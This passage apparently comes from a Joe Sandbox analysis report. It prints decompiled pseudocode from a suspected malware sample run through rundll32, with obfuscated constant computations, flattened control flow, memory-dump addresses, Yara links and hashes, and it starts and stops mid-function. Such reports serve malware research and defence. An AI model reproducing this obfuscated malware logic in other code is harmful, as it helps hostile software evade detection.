				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t231;
				intOrPtr _t232;
				intOrPtr _t233;
				void* _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				void* _t266;
				void* _t267;
				signed int* _t270;
				signed int* _t271;

				_t270 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0x6c2b32;
				_v8 = 0x58b11;
				_v64 = 0x37f8ee;
				_v64 = _v64 + 0xffff6702;
				_v64 = _v64 ^ 0xad40df3f;
				_v64 = _v64 ^ 0xad79282c;
				_v100 = 0x6d524;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 + 0x2921;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00050ee9;
				_v28 = 0x9e9a;
				_t266 = __edx;
				_t237 = __ecx;
				_t267 = 0x52ffaa2;
				_t239 = 0xb;
				_v28 = _v28 / _t239;
				_v28 = _v28 ^ 0x00028e70;
				_v32 = 0x2476b5;
				_t240 = 0x6f;
				_v32 = _v32 / _t240;
				_v32 = _v32 ^ 0x0008b44d;
				_v60 = 0x9e7d2d;
				_v60 = _v60 >> 0xc;
				_v60 = _v60 << 0xe;
				_v60 = _v60 ^ 0x02752993;
				_v24 = 0xe09194;
				_t241 = 0x44;
				_v24 = _v24 / _t241;
				_v24 = _v24 ^ 0x0009703f;
				_v96 = 0x854eb1;
				_v96 = _v96 + 0xc1c6;
				_v96 = _v96 * 0x1a;
				_v96 = _v96 | 0x594c04b7;
				_v96 = _v96 ^ 0x5dd9e9b5;
				_v20 = 0x86d30b;
				_v20 = _v20 | 0xe45dff90;
				_v20 = _v20 ^ 0xe4d4624e;
				_v92 = 0x8501b9;
				_v92 = _v92 >> 6;
				_v92 = _v92 * 0x2f;
				_v92 = _v92 + 0xe9ed;
				_v92 = _v92 ^ 0x0060653e;
				_v52 = 0xaa921f;
				_v52 = _v52 ^ 0x3dfd2146;
				_v52 = _v52 >> 1;
				_v52 = _v52 ^ 0x1ea8ab64;
				_v56 = 0x2765e6;
				_v56 = _v56 ^ 0x5c8ea534;
				_v56 = _v56 | 0xccee86e2;
				_v56 = _v56 ^ 0xdcebf872;
				_v88 = 0x89b797;
				_v88 = _v88 + 0x84ba;
				_v88 = _v88 + 0xc14;
				_v88 = _v88 | 0xbe23ba3f;
				_v88 = _v88 ^ 0xbea6e118;
				_v48 = 0x866a1d;
				_v48 = _v48 >> 9;
				_v48 = _v48 * 0x16;
				_v48 = _v48 ^ 0x0007ec78;
				_v16 = 0x7d5d8a;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000578c4;
				_v68 = 0x2c77b1;
				_v68 = _v68 | 0xad369f51;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0xdff48475;
				_v72 = 0x3ef83;
				_v72 = _v72 << 3;
				_v72 = _v72 + 0xb46;
				_v72 = _v72 ^ 0x001ba742;
				_v76 = 0x4a0f2c;
				_t242 = 0x6a;
				_v76 = _v76 * 0x54;
				_v76 = _v76 << 0xa;
				_v76 = _v76 ^ 0x33e29f20;
				_v36 = 0x9fb368;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x000f389a;
				_v40 = 0x5cfe3a;
				_v40 = _v40 + 0x27ff;
				_v40 = _v40 ^ 0x005ee30c;
				_v104 = 0xfd26ea;
				_v104 = _v104 << 9;
				_v104 = _v104 + 0xffff1095;
				_v104 = _v104 + 0xffffd24c;
				_v104 = _v104 ^ 0xfa4b2973;
				_v80 = 0xbb493f;
				_v80 = _v80 + 0x4ae2;
				_v80 = _v80 | 0xbb4dbcb8;
				_v80 = _v80 + 0x3bc7;
				_v80 = _v80 ^ 0xbbf0b3fa;
				_v44 = 0xfc3c2e;
				_v44 = _v44 << 0x10;
				_v44 = _v44 + 0xffff4208;
				_v44 = _v44 ^ 0x3c281d99;
				_v84 = 0xc50344;
				_v84 = _v84 | 0xb9ed19f4;
				_v84 = _v84 / _t242;
				_t243 = 0x6b;
				_v84 = _v84 / _t243;
				_v84 = _v84 ^ 0x000f16db;
				while(1) {
					L1:
					_t231 = 0xc3f018b;
					do {
						L2:
						while(_t267 != 0x52ffaa2) {
							if(_t267 == 0x865547f) {
								_t243 = _v88;
								_t232 = E002CCDAE(_v88, _v48, _v16,  *((intOrPtr*)(_t266 + 0x38)));
								_t270 =  &(_t270[2]);
								 *((intOrPtr*)(_t266 + 0x1c)) = _t232;
								__eflags = _t232;
								_t231 = 0xc3f018b;
								_t267 =  !=  ? 0xc3f018b : 0xb7a2405;
								continue;
							}
							if(_t267 == 0xb133873) {
								_push(_v32);
								_t233 = E002DC3A0(_t237, _v64, __eflags, _v100, _v28, _t243);
								_t271 =  &(_t270[4]);
								 *((intOrPtr*)(_t266 + 0x38)) = _t233;
								__eflags = _t233;
								if(_t233 != 0) {
									E002C7B8B( *((intOrPtr*)(_t266 + 0x38)), _v60,  *((intOrPtr*)(_t266 + 0x38)), _v24, _v96);
									_push( *((intOrPtr*)(_t266 + 0x38)));
									_push(_v56);
									_push(_v52);
									_t243 = _v20;
									E002C7C37(_v20, _v92);
									_t270 =  &(_t271[6]);
									_t267 = 0x865547f;
									goto L1;
								}
							} else {
								if(_t267 == 0xb7a2405) {
									return E002D9E56(_v80, _v44, _v84,  *((intOrPtr*)(_t266 + 0x38)));
								}
								if(_t267 != _t231) {
									goto L13;
								} else {
									_t233 = E002C46BE(_t243, _v68, _t243, _v72, _t243, _v76, _v36, _v40, _t243, _t266, E002C4C5D, _v104);
									_t270 =  &(_t270[0xa]);
									 *((intOrPtr*)(_t266 + 0x2c)) = _t233;
									if(_t233 == 0) {
										_t267 = 0xb7a2405;
										while(1) {
											L1:
											_t231 = 0xc3f018b;
											goto L2;
										}
									}
								}
							}
							return _t233;
						}
						_t267 = 0xb133873;
						L13:
						__eflags = _t267 - 0x1aeb2e;
					} while (__eflags != 0);
					return _t231;
				}
			}









































                                                                                                                                    0x002cb74d
                                                                                                                                    0x002cb750
                                                                                                                                    0x002cb755
                                                                                                                                    0x002cb75d
                                                                                                                                    0x002cb765
                                                                                                                                    0x002cb76d
                                                                                                                                    0x002cb775
                                                                                                                                    0x002cb77d
                                                                                                                                    0x002cb785
                                                                                                                                    0x002cb78d
                                                                                                                                    0x002cb792
                                                                                                                                    0x002cb79a
                                                                                                                                    0x002cb79f
                                                                                                                                    0x002cb7a7
                                                                                                                                    0x002cb7b7
                                                                                                                                    0x002cb7b9
                                                                                                                                    0x002cb7bf
                                                                                                                                    0x002cb7c4
                                                                                                                                    0x002cb7c9
                                                                                                                                    0x002cb7cf
                                                                                                                                    0x002cb7d7
                                                                                                                                    0x002cb7e3
                                                                                                                                    0x002cb7e8
                                                                                                                                    0x002cb7ee
                                                                                                                                    0x002cb7f6
                                                                                                                                    0x002cb7fe
                                                                                                                                    0x002cb803
                                                                                                                                    0x002cb808
                                                                                                                                    0x002cb810
                                                                                                                                    0x002cb81c
                                                                                                                                    0x002cb81f
                                                                                                                                    0x002cb823
                                                                                                                                    0x002cb82b
                                                                                                                                    0x002cb833
                                                                                                                                    0x002cb840
                                                                                                                                    0x002cb844
                                                                                                                                    0x002cb84c
                                                                                                                                    0x002cb854
                                                                                                                                    0x002cb85c
                                                                                                                                    0x002cb864
                                                                                                                                    0x002cb86c
                                                                                                                                    0x002cb874
                                                                                                                                    0x002cb87e
                                                                                                                                    0x002cb882
                                                                                                                                    0x002cb88a
                                                                                                                                    0x002cb892
                                                                                                                                    0x002cb89a
                                                                                                                                    0x002cb8a2
                                                                                                                                    0x002cb8a6
                                                                                                                                    0x002cb8ae
                                                                                                                                    0x002cb8b6
                                                                                                                                    0x002cb8be
                                                                                                                                    0x002cb8c6
                                                                                                                                    0x002cb8ce
                                                                                                                                    0x002cb8d6
                                                                                                                                    0x002cb8de
                                                                                                                                    0x002cb8e6
                                                                                                                                    0x002cb8ee
                                                                                                                                    0x002cb8f6
                                                                                                                                    0x002cb8fe
                                                                                                                                    0x002cb908
                                                                                                                                    0x002cb90c
                                                                                                                                    0x002cb914
                                                                                                                                    0x002cb91c
                                                                                                                                    0x002cb923
                                                                                                                                    0x002cb930
                                                                                                                                    0x002cb938
                                                                                                                                    0x002cb940
                                                                                                                                    0x002cb945
                                                                                                                                    0x002cb94d
                                                                                                                                    0x002cb955
                                                                                                                                    0x002cb95a
                                                                                                                                    0x002cb962
                                                                                                                                    0x002cb96a
                                                                                                                                    0x002cb979
                                                                                                                                    0x002cb97c
                                                                                                                                    0x002cb980
                                                                                                                                    0x002cb985
                                                                                                                                    0x002cb98d
                                                                                                                                    0x002cb995
                                                                                                                                    0x002cb99a
                                                                                                                                    0x002cb9a2
                                                                                                                                    0x002cb9aa
                                                                                                                                    0x002cb9b2
                                                                                                                                    0x002cb9ba
                                                                                                                                    0x002cb9c2
                                                                                                                                    0x002cb9c7
                                                                                                                                    0x002cb9cf
                                                                                                                                    0x002cb9d7
                                                                                                                                    0x002cb9df
                                                                                                                                    0x002cb9e7
                                                                                                                                    0x002cb9ef
                                                                                                                                    0x002cb9f7
                                                                                                                                    0x002cb9ff
                                                                                                                                    0x002cba07
                                                                                                                                    0x002cba0f
                                                                                                                                    0x002cba14
                                                                                                                                    0x002cba1c
                                                                                                                                    0x002cba24
                                                                                                                                    0x002cba2c
                                                                                                                                    0x002cba3c
                                                                                                                                    0x002cba44
                                                                                                                                    0x002cba47
                                                                                                                                    0x002cba4b
                                                                                                                                    0x002cba53
                                                                                                                                    0x002cba53
                                                                                                                                    0x002cba53
                                                                                                                                    0x002cba58
                                                                                                                                    0x00000000
                                                                                                                                    0x002cba58
                                                                                                                                    0x002cba6a
                                                                                                                                    0x002cbb2d
                                                                                                                                    0x002cbb31
                                                                                                                                    0x002cbb36
                                                                                                                                    0x002cbb39
                                                                                                                                    0x002cbb3c
                                                                                                                                    0x002cbb40
                                                                                                                                    0x002cbb45
                                                                                                                                    0x00000000
                                                                                                                                    0x002cbb45
                                                                                                                                    0x002cba76
                                                                                                                                    0x002cbac0
                                                                                                                                    0x002cbad3
                                                                                                                                    0x002cbad8
                                                                                                                                    0x002cbadb
                                                                                                                                    0x002cbade
                                                                                                                                    0x002cbae0
                                                                                                                                    0x002cbaf8
                                                                                                                                    0x002cbafd
                                                                                                                                    0x002cbb00
                                                                                                                                    0x002cbb04
                                                                                                                                    0x002cbb0c
                                                                                                                                    0x002cbb10
                                                                                                                                    0x002cbb15
                                                                                                                                    0x002cbb18
                                                                                                                                    0x00000000
                                                                                                                                    0x002cbb18
                                                                                                                                    0x002cba78
                                                                                                                                    0x002cba7a
                                                                                                                                    0x00000000
                                                                                                                                    0x002cbb75
                                                                                                                                    0x002cba82
                                                                                                                                    0x00000000
                                                                                                                                    0x002cba88
                                                                                                                                    0x002cbaa9
                                                                                                                                    0x002cbaae
                                                                                                                                    0x002cbab1
                                                                                                                                    0x002cbab6
                                                                                                                                    0x002cbabc
                                                                                                                                    0x002cba53
                                                                                                                                    0x002cba53
                                                                                                                                    0x002cba53
                                                                                                                                    0x00000000
                                                                                                                                    0x002cba53
                                                                                                                                    0x002cba53
                                                                                                                                    0x002cbab6
                                                                                                                                    0x002cba82
                                                                                                                                    0x002cbb7d
                                                                                                                                    0x002cbb7d
                                                                                                                                    0x002cbb4d
                                                                                                                                    0x002cbb52
                                                                                                                                    0x002cbb52
                                                                                                                                    0x002cbb52
                                                                                                                                    0x00000000
                                                                                                                                    0x002cba58

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: !)$2+l$>e`$?p$J$e'
                                                                                                                                    • API String ID: 0-1675410552
                                                                                                                                    • Opcode ID: abd2b99392ae732305241540355a6ddc0e98a35cc94223273aedf4d18e0d5c71
                                                                                                                                    • Instruction ID: e3157e99eb15b5200b7d6bdbf16e818d3468777f6909db71f434869e664a9b99
                                                                                                                                    • Opcode Fuzzy Hash: abd2b99392ae732305241540355a6ddc0e98a35cc94223273aedf4d18e0d5c71
                                                                                                                                    • Instruction Fuzzy Hash: 13B140724083419FC359CF65C58A80BFBE2FBC5758F108A1CF58A96260D3B5CA69CF86
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002CE5CF Relevance: 7.7, Strings: 6, Instructions: 204COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002CE5CF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t170;
				void* _t181;
				void* _t184;
				void* _t189;
				void* _t192;
				void* _t195;
				void* _t197;
				void* _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int* _t226;

				_push(_a8);
				_t219 = _a4;
				_t195 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t170);
				_v56 = 0xa4c651;
				_t226 =  &(( &_v116)[4]);
				_v56 = _v56 ^ 0x6a6d8bac;
				_v56 = _v56 ^ 0x6ac6bd64;
				_t220 = 0;
				_v60 = 0xbac055;
				_t197 = 0xf39239f;
				_v60 = _v60 << 0xd;
				_v60 = _v60 ^ 0x580542e6;
				_v108 = 0xd580f5;
				_v108 = _v108 ^ 0x97cdda0d;
				_v108 = _v108 + 0x37dd;
				_v108 = _v108 >> 0xe;
				_v108 = _v108 ^ 0x00021113;
				_v52 = 0xf28435;
				_v52 = _v52 | 0x057a1a90;
				_v52 = _v52 ^ 0x05fdc129;
				_v80 = 0x5c8bc8;
				_t221 = 0x27;
				_v80 = _v80 / _t221;
				_t222 = 0x1b;
				_v80 = _v80 * 9;
				_v80 = _v80 ^ 0x0013f028;
				_v96 = 0x281d9a;
				_v96 = _v96 + 0xffff8f77;
				_v96 = _v96 + 0x4719;
				_v96 = _v96 << 0xf;
				_v96 = _v96 ^ 0xfa152b1c;
				_v112 = 0x7415d8;
				_v112 = _v112 >> 0xf;
				_v112 = _v112 + 0xfffff76c;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 ^ 0x000d779a;
				_v88 = 0xb68707;
				_v88 = _v88 ^ 0x45e0ecf4;
				_v88 = _v88 + 0xffff71c0;
				_v88 = _v88 ^ 0x455519c2;
				_v116 = 0xceabf6;
				_v116 = _v116 + 0x1225;
				_v116 = _v116 / _t222;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x0006e3bb;
				_v84 = 0xd525a4;
				_v84 = _v84 + 0xffff1243;
				_v84 = _v84 + 0x1c30;
				_v84 = _v84 ^ 0x00df7efc;
				_v100 = 0xf29ecf;
				_v100 = _v100 << 0xc;
				_v100 = _v100 + 0xffff4e95;
				_v100 = _v100 ^ 0x70d6065d;
				_v100 = _v100 ^ 0x593d89f0;
				_v104 = 0x2206c6;
				_v104 = _v104 | 0x38687435;
				_v104 = _v104 ^ 0xadcf411b;
				_v104 = _v104 ^ 0x9549ac77;
				_v104 = _v104 ^ 0x00e3f730;
				_v92 = 0xd38a43;
				_v92 = _v92 >> 3;
				_v92 = _v92 + 0x6fd1;
				_v92 = _v92 ^ 0x0012c73c;
				_v64 = 0x625266;
				_v64 = _v64 + 0x2436;
				_v64 = _v64 ^ 0x006987c3;
				_v68 = 0xe296bd;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x52d9a139;
				_v72 = 0x54a2fd;
				_v72 = _v72 << 0xd;
				_v72 = _v72 >> 0xa;
				_v72 = _v72 ^ 0x002b3e4c;
				_v76 = 0x32cdcd;
				_v76 = _v76 << 0xb;
				_t223 = 0x32;
				_v76 = _v76 / _t223;
				_v76 = _v76 ^ 0x0302c408;
				_v48 = 0x2d2164;
				_v48 = _v48 + 0xfffff0e0;
				_v48 = _v48 ^ 0x0021ab5a;
				do {
					while(_t197 != 0x2168849) {
						if(_t197 == 0x29fa3de) {
							_t184 = E002C2A21(_v84, _v100,  &_v44, _t219 + 0x20, _v104);
							_t226 =  &(_t226[3]);
							__eflags = _t184;
							if(__eflags != 0) {
								_t197 = 0x74ac459;
								continue;
							}
						} else {
							if(_t197 == 0x545de14) {
								E002C3DBC( &_v44, _t195, _v56, _v60, _v108);
								_t226 =  &(_t226[3]);
								_t197 = 0x2168849;
								continue;
							} else {
								if(_t197 == 0x6ab10c5) {
									_t189 = E002C2A21(_v112, _v88,  &_v44, _t219 + 0x1c, _v116);
									_t226 =  &(_t226[3]);
									__eflags = _t189;
									if(__eflags != 0) {
										_t197 = 0x29fa3de;
										continue;
									}
								} else {
									if(_t197 == 0x74ac459) {
										_t192 = E002C2A21(_v92, _v64,  &_v44, _t219 + 0x28, _v68);
										_t226 =  &(_t226[3]);
										__eflags = _t192;
										if(__eflags != 0) {
											_t197 = 0x9dbfb8a;
											continue;
										}
									} else {
										if(_t197 == 0x9dbfb8a) {
											__eflags = E002DD97D( &_v44, _v72, __eflags, _v76, _t219 + 4, _v48);
											_t220 =  !=  ? 1 : _t220;
										} else {
											if(_t197 != 0xf39239f) {
												goto L19;
											} else {
												_t197 = 0x545de14;
												continue;
											}
										}
									}
								}
							}
						}
						L22:
						return _t220;
					}
					_t181 = E002C2A21(_v52, _v80,  &_v44, _t219 + 0x14, _v96);
					_t226 =  &(_t226[3]);
					__eflags = _t181;
					if(__eflags == 0) {
						_t197 = 0x90a774d;
						goto L19;
					} else {
						_t197 = 0x6ab10c5;
						continue;
					}
					goto L22;
					L19:
					__eflags = _t197 - 0x90a774d;
				} while (__eflags != 0);
				goto L22;
			}


































                                                                                                                                    0x002ce5d6
                                                                                                                                    0x002ce5dd
                                                                                                                                    0x002ce5e4
                                                                                                                                    0x002ce5e6
                                                                                                                                    0x002ce5e7
                                                                                                                                    0x002ce5e8
                                                                                                                                    0x002ce5e9
                                                                                                                                    0x002ce5ee
                                                                                                                                    0x002ce5f6
                                                                                                                                    0x002ce5f9
                                                                                                                                    0x002ce603
                                                                                                                                    0x002ce60b
                                                                                                                                    0x002ce60d
                                                                                                                                    0x002ce615
                                                                                                                                    0x002ce61a
                                                                                                                                    0x002ce61f
                                                                                                                                    0x002ce627
                                                                                                                                    0x002ce62f
                                                                                                                                    0x002ce637
                                                                                                                                    0x002ce63f
                                                                                                                                    0x002ce644
                                                                                                                                    0x002ce64c
                                                                                                                                    0x002ce654
                                                                                                                                    0x002ce65c
                                                                                                                                    0x002ce664
                                                                                                                                    0x002ce672
                                                                                                                                    0x002ce677
                                                                                                                                    0x002ce682
                                                                                                                                    0x002ce683
                                                                                                                                    0x002ce687
                                                                                                                                    0x002ce68f
                                                                                                                                    0x002ce697
                                                                                                                                    0x002ce69f
                                                                                                                                    0x002ce6a7
                                                                                                                                    0x002ce6ac
                                                                                                                                    0x002ce6b4
                                                                                                                                    0x002ce6bc
                                                                                                                                    0x002ce6c1
                                                                                                                                    0x002ce6c9
                                                                                                                                    0x002ce6ce
                                                                                                                                    0x002ce6d6
                                                                                                                                    0x002ce6de
                                                                                                                                    0x002ce6e6
                                                                                                                                    0x002ce6ee
                                                                                                                                    0x002ce6f6
                                                                                                                                    0x002ce6fe
                                                                                                                                    0x002ce70c
                                                                                                                                    0x002ce710
                                                                                                                                    0x002ce715
                                                                                                                                    0x002ce71d
                                                                                                                                    0x002ce725
                                                                                                                                    0x002ce72d
                                                                                                                                    0x002ce735
                                                                                                                                    0x002ce73d
                                                                                                                                    0x002ce745
                                                                                                                                    0x002ce74a
                                                                                                                                    0x002ce752
                                                                                                                                    0x002ce75a
                                                                                                                                    0x002ce762
                                                                                                                                    0x002ce76a
                                                                                                                                    0x002ce772
                                                                                                                                    0x002ce77a
                                                                                                                                    0x002ce782
                                                                                                                                    0x002ce78a
                                                                                                                                    0x002ce792
                                                                                                                                    0x002ce797
                                                                                                                                    0x002ce79f
                                                                                                                                    0x002ce7a7
                                                                                                                                    0x002ce7af
                                                                                                                                    0x002ce7b9
                                                                                                                                    0x002ce7c1
                                                                                                                                    0x002ce7c9
                                                                                                                                    0x002ce7ce
                                                                                                                                    0x002ce7d6
                                                                                                                                    0x002ce7de
                                                                                                                                    0x002ce7e3
                                                                                                                                    0x002ce7e8
                                                                                                                                    0x002ce7f0
                                                                                                                                    0x002ce7f8
                                                                                                                                    0x002ce803
                                                                                                                                    0x002ce80b
                                                                                                                                    0x002ce80f
                                                                                                                                    0x002ce817
                                                                                                                                    0x002ce81f
                                                                                                                                    0x002ce827
                                                                                                                                    0x002ce82f
                                                                                                                                    0x002ce82f
                                                                                                                                    0x002ce83d
                                                                                                                                    0x002ce90f
                                                                                                                                    0x002ce914
                                                                                                                                    0x002ce917
                                                                                                                                    0x002ce919
                                                                                                                                    0x002ce91b
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce91b
                                                                                                                                    0x002ce843
                                                                                                                                    0x002ce849
                                                                                                                                    0x002ce8e8
                                                                                                                                    0x002ce8ed
                                                                                                                                    0x002ce8f0
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce84f
                                                                                                                                    0x002ce855
                                                                                                                                    0x002ce8bf
                                                                                                                                    0x002ce8c4
                                                                                                                                    0x002ce8c7
                                                                                                                                    0x002ce8c9
                                                                                                                                    0x002ce8cf
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce8cf
                                                                                                                                    0x002ce857
                                                                                                                                    0x002ce85d
                                                                                                                                    0x002ce893
                                                                                                                                    0x002ce898
                                                                                                                                    0x002ce89b
                                                                                                                                    0x002ce89d
                                                                                                                                    0x002ce8a3
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce8a3
                                                                                                                                    0x002ce85f
                                                                                                                                    0x002ce865
                                                                                                                                    0x002ce982
                                                                                                                                    0x002ce984
                                                                                                                                    0x002ce86b
                                                                                                                                    0x002ce871
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce877
                                                                                                                                    0x002ce877
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce877
                                                                                                                                    0x002ce871
                                                                                                                                    0x002ce865
                                                                                                                                    0x002ce85d
                                                                                                                                    0x002ce855
                                                                                                                                    0x002ce849
                                                                                                                                    0x002ce988
                                                                                                                                    0x002ce990
                                                                                                                                    0x002ce990
                                                                                                                                    0x002ce93a
                                                                                                                                    0x002ce93f
                                                                                                                                    0x002ce942
                                                                                                                                    0x002ce944
                                                                                                                                    0x002ce950
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce946
                                                                                                                                    0x002ce946
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce946
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce955
                                                                                                                                    0x002ce955
                                                                                                                                    0x002ce955
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 5th8$6$$L>+$Mw$Mw$fRb
                                                                                                                                    • API String ID: 0-3812525031
                                                                                                                                    • Opcode ID: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                                    • Instruction ID: 09ec270b35e3a031e3c3776565f344ea6bd52888314eefe2efd71f354329d8a2
                                                                                                                                    • Opcode Fuzzy Hash: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                                    • Instruction Fuzzy Hash: 869175B21183429BC794CE60C88A91BFBF5FBD4758F104A1DF59292220D7B1CA29CF83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002F81E Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 100357B5
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 100357F8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                    • Opcode ID: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                                    • Instruction ID: 3237c6aacfb12be4d9d12df29f826ae8d0614ddfd4a103b53015e2b6a0b2c6c3
                                                                                                                                    • Opcode Fuzzy Hash: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                                    • Instruction Fuzzy Hash: B021FFB4801320CFFB11DF68EDC56483BB4FB88315F50606AE90D87A71E7B16A80AF56
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002E0056 Relevance: 6.7, Strings: 5, Instructions: 443COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E002E0056() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				unsigned int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				void* _t500;
				void* _t502;
				intOrPtr* _t509;
				void* _t513;
				signed int _t522;
				intOrPtr _t523;
				intOrPtr* _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				void* _t540;
				void* _t546;
				intOrPtr _t556;
				void* _t603;
				signed int _t605;
				signed int* _t609;

				_t609 =  &_v1748;
				_v1648 = 0xded5e0;
				_v1648 = _v1648 >> 0xb;
				_v1648 = _v1648 | 0x3a1a97de;
				_v1648 = _v1648 ^ 0x3a1a9ff7;
				_v1608 = 0x6694ca;
				_v1608 = _v1608 | 0xdc2b4f48;
				_v1608 = _v1608 ^ 0x5c6fdfcb;
				_v1712 = 0x53f825;
				_v1712 = _v1712 >> 2;
				_v1712 = _v1712 ^ 0x4e440c95;
				_v1712 = _v1712 | 0x7235b0e7;
